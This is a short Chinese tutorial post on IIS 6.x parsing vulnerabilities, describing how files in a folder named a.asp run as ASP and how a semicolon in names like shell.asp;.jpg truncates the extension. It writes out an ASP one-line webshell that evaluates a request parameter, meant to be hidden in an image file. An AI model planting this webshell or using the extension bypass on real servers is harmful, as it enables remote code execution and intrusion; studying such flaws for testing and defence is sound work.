IIS解析漏洞

Zmxcl-0072024-12-23 14:15

IIS6.X

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>

#asp一句话

<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

相关推荐
a程序小傲11 分钟前
得物Java面试被问:流批一体架构的实现和状态管理
java·开发语言·数据库·redis·缓存·面试·架构
Jess0718 分钟前
MySQL操作库 —— 库的操作
数据库·mysql
ycydynq30 分钟前
django 数据库 单表操作
数据库·oracle·django
是三好37 分钟前
MQ消息队列
服务器·mq
qq_12498707531 小时前
基于SpringBoot的闪电队篮球俱乐部管理系统的设计与开发(源码+论文+部署+安装)
java·数据库·spring boot·后端·spring·毕业设计·计算机毕业设计
开开心心_Every1 小时前
PDF转图片工具推荐:免费支持批量转换
linux·运维·服务器·spring boot·edge·pdf·powerpoint
小白电脑技术1 小时前
SMB挂载与iSCSI挂载飞牛存储:你该选择哪一种连接方式?
服务器·电脑
仍然.1 小时前
MySQL--数据库基础
数据库·mysql
郝学胜-神的一滴1 小时前
Python中的with语句与try语句:资源管理的两种哲学
linux·服务器·开发语言·python·程序人生·算法
难得的我们1 小时前
如何为开源Python项目做贡献?
jvm·数据库·python
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Claude Code Skills 实用使用手册04Open Code教程(四)| 高级配置与集成05UV安装并设置国内源06Linux下V2Ray安装配置指南07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南09Labelme从安装到标注:零基础完整指南10struts2 XML外部实体注入漏洞复现(CVE-2025-68493)